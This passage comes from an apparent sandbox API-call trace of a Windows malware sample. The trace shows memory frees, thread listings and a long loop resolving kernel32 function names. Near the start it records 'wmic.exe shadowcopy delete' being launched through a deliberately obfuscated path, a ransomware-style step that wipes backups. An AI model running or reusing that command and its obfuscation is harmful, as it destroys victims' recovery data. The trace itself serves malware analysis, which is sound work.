shadowcopy delete") returned 125 [0090.326] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c20000 [0090.326] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0090.343] Wow64DisableWow64FsRedirection (in: OldValue=0xc9f220 | out: OldValue=0xc9f220*=0x0) returned 1 [0090.343] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\bkbe\\yq\\gay\\..\\..\\..\\Windows\\cyh\\huxn\\t\\..\\..\\..\\system32\\a\\e\\b\\..\\..\\..\\wbem\\rop\\mxutf\\..\\..\\wmic.exe\" shadowcopy delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0xc9f1dc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc9f25c | out: lpCommandLine="\"C:\\bkbe\\yq\\gay\\..\\..\\..\\Windows\\cyh\\huxn\\t\\..\\..\\..\\system32\\a\\e\\b\\..\\..\\..\\wbem\\rop\\mxutf\\..\\..\\wmic.exe\" shadowcopy delete", lpProcessInformation=0xc9f25c*(hProcess=0x420, hThread=0x41c, dwProcessId=0x6a8, dwThreadId=0x4fc)) returned 1 [0090.355] CloseHandle (hObject=0x420) returned 1 [0090.355] CloseHandle (hObject=0x41c) returned 1 [0090.356] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c20000 [0090.356] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x76c4d668 [0090.356] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0090.356] VirtualFree (lpAddress=0x12b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.356] VirtualFree (lpAddress=0x12a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.356] SetThreadExecutionState (esFlags=0x80000000) returned 0x80000001 [0090.360] VirtualFree (lpAddress=0x170000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.360] VirtualFree (lpAddress=0x1a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.360] VirtualFree (lpAddress=0x180000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.360] VirtualFree (lpAddress=0x190000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.361] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.361] VirtualFree (lpAddress=0x360000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.361] DsRoleFreeMemory () returned 0x0 [0090.361] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.361] VirtualFree (lpAddress=0x150000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.362] VirtualFree (lpAddress=0x140000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.362] VirtualFree (lpAddress=0x130000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.362] WaitForSingleObject (hHandle=0x1e0, dwMilliseconds=0x186a0) Thread: id = 4 os_tid = 0x9b4 Thread: id = 5 os_tid = 0x9b8 Thread: id = 6 os_tid = 0x9bc Thread: id = 7 os_tid = 0x9c0 Thread: id = 57 os_tid = 0xa0c Thread: id = 58 os_tid = 0xa94 [0048.161] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x580000 [0048.161] lstrlenA (lpString="kernel32.dll") returned 12 [0048.162] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0048.162] lstrcpyA (in: lpString1=0x32df0d8, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0048.162] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0048.162] lstrcpyA (in: lpString1=0x32df0d8, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0048.162] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0048.162] lstrcpyA (in: lpString1=0x32df0d8, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0048.162] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0048.162] lstrcpyA (in: lpString1=0x32df0d8, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0048.162] lstrlenA (lpString="ADDATOMA") returned 8 [0048.162] lstrcpyA (in: lpString1=0x32df0d8, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0048.162] lstrlenA (lpString="ADDATOMW") returned 8 [0048.162] lstrcpyA (in: lpString1=0x32df0d8, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0048.162] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0048.162] lstrcpyA (in: lpString1=0x32df0d8, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0048.162] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0048.162] lstrcpyA (in: lpString1=0x32df0d8, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0048.162] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0048.162] lstrcpyA (in: lpString1=0x32df0d8, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0048.162] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0048.162] lstrcpyA (in: lpString1=0x32df0d8, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0048.162] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0048.162] lstrcpyA (in: lpString1=0x32df0d8, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0048.162] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0048.163] lstrcpyA (in: lpString1=0x32df0d8, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0048.163] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0048.163] lstrcpyA (in: lpString1=0x32df0d8, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0048.163] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0048.163] lstrcpyA (in: lpString1=0x32df0d8, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0048.163] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0048.163] lstrcpyA (in: lpString1=0x32df0d8, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0048.163] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0048.163] lstrcpyA (in: lpString1=0x32df0d8, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0048.163] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0048.163] lstrcpyA (in: lpString1=0x32df0d8, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0048.163] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0048.163] lstrcpyA (in: lpString1=0x32df0d8, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0048.163] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0048.163] lstrcpyA (in: lpString1=0x32df0d8, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0048.163] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0048.163] lstrcpyA (in: lpString1=0x32df0d8, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0048.163] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0048.163] lstrcpyA (in: lpString1=0x32df0d8, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0048.163] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0048.163] lstrcpyA (in: lpString1=0x32df0d8, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0048.163] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0048.163] lstrcpyA (in: lpString1=0x32df0d8, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0048.163] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0048.163] lstrcpyA (in: lpString1=0x32df0d8, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0048.163] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0048.163] lstrcpyA (in: lpString1=0x32df0d8, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0048.164] lstrlenA (lpString="BACKUPREAD") returned 10 [0048.164] lstrcpyA (in: lpString1=0x32df0d8, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0048.164] lstrlenA (lpString="BACKUPSEEK") returned 10 [0048.164] lstrcpyA (in: lpString1=0x32df0d8, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0048.164] lstrlenA (lpString="BACKUPWRITE") returned 11 [0048.164] lstrcpyA (in: lpString1=0x32df0d8, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0048.164] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0048.164] lstrcpyA (in: lpString1=0x32df0d8, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0048.164] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0048.164] lstrcpyA (in: lpString1=0x32df0d8, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0048.164] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0048.164] lstrcpyA (in: lpString1=0x32df0d8, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0048.164] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0048.164] lstrcpyA (in: lpString1=0x32df0d8, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0048.164] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0048.164] lstrcpyA (in: lpString1=0x32df0d8, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0048.164] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0048.164] lstrcpyA (in: lpString1=0x32df0d8, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0048.164] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0048.164] lstrcpyA (in: lpString1=0x32df0d8, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0048.164] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0048.164] lstrcpyA (in: lpString1=0x32df0d8, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0048.164] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0048.164] lstrcpyA (in: lpString1=0x32df0d8, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0048.164] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0048.164] lstrcpyA (in: lpString1=0x32df0d8, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0048.164] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0048.165] lstrcpyA (in: lpString1=0x32df0d8, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0048.165] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0048.165] lstrcpyA (in: lpString1=0x32df0d8, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0048.165] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0048.165] lstrcpyA (in: lpString1=0x32df0d8, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0048.165] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0048.165] lstrcpyA (in: lpString1=0x32df0d8, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0048.165] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0048.165] lstrcpyA (in: lpString1=0x32df0d8, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0048.165] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0048.165] lstrcpyA (in: lpString1=0x32df0d8, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0048.165] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0048.165] lstrcpyA (in: lpString1=0x32df0d8, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0048.165] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0048.165] lstrcpyA (in: lpString1=0x32df0d8, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0048.165] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0048.165] lstrcpyA (in: lpString1=0x32df0d8, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0048.165] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0048.165] lstrcpyA (in: lpString1=0x32df0d8, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0048.165] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0048.165] lstrcpyA (in: lpString1=0x32df0d8, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0048.165] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0048.165] lstrcpyA (in: lpString1=0x32df0d8, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0048.165] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0048.165] lstrcpyA (in: lpString1=0x32df0d8, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0048.165] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0048.166] lstrcpyA (in: lpString1=0x32df0d8, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0048.166] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0048.166] lstrcpyA (in: lpString1=0x32df0d8, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0048.166] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0048.166] lstrcpyA (in: lpString1=0x32df0d8, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0048.166] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0048.166] lstrcpyA (in: lpString1=0x32df0d8, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0048.166] lstrlenA (lpString="BEEP") returned 4 [0048.166] lstrcpyA (in: lpString1=0x32df0d8, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0048.166] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0048.166] lstrcpyA (in: lpString1=0x32df0d8, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0048.166] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0048.166] lstrcpyA (in: lpString1=0x32df0d8, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0048.166] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0048.166] lstrcpyA (in: lpString1=0x32df0d8, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0048.166] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0048.166] lstrcpyA (in: lpString1=0x32df0d8, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0048.166] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0048.166] lstrcpyA (in: lpString1=0x32df0d8, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0048.166] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0048.166] lstrcpyA (in: lpString1=0x32df0d8, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0048.166] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0048.166] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0048.166] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0048.166] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0048.166] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0048.166] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0048.166] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0048.167] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0048.167] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0048.167] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0048.167] lstrlenA (lpString="CANCELIO") returned 8 [0048.167] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0048.167] lstrlenA (lpString="CANCELIOEX") returned 10 [0048.167] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0048.167] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0048.167] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0048.167] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0048.167] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0048.167] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0048.167] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0048.167] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0048.167] lstrcpyA (in: lpString1=0x32df0d8, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0048.167] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0048.167] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0048.167] lstrlenA (lpString="CHECKELEVATION") returned 14 [0048.167] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0048.167] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0048.167] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0048.167] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0048.167] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0048.167] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0048.167] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0048.167] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0048.168] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0048.168] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0048.168] lstrcpyA (in: lpString1=0x32df0d8, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0048.168] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0048.168] lstrcpyA (in: lpString1=0x32df0d8, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0048.168] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0048.168] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0048.168] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0048.168] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0048.168] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0048.168] lstrcpyA (in: lpString1=0x32df0d8, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0048.168] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0048.168] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0048.168] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0048.168] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0048.168] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0048.168] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0048.168] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0048.168] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0048.168] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0048.168] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0048.168] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0048.168] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0048.168] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0048.168] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0048.168] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0048.168] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0048.169] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0048.169] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0048.169] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0048.169] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0048.169] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0048.169] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0048.169] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0048.169] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0048.169] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0048.169] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0048.169] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0048.169] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0048.169] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0048.169] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0048.169] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0048.169] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0048.169] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0048.169] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0048.169] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0048.169] lstrcpyA (in: lpString1=0x32df0d8, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0048.169] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0048.170] lstrcpyA (in: lpString1=0x32df0d8, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0048.170] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0048.170] lstrcpyA (in: lpString1=0x32df0d8, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0048.170] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0048.170] lstrcpyA (in: lpString1=0x32df0d8, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0048.170] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0048.170] lstrcpyA (in: lpString1=0x32df0d8, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0048.170] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0048.170] lstrcpyA (in: lpString1=0x32df0d8, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0048.170] lstrlenA 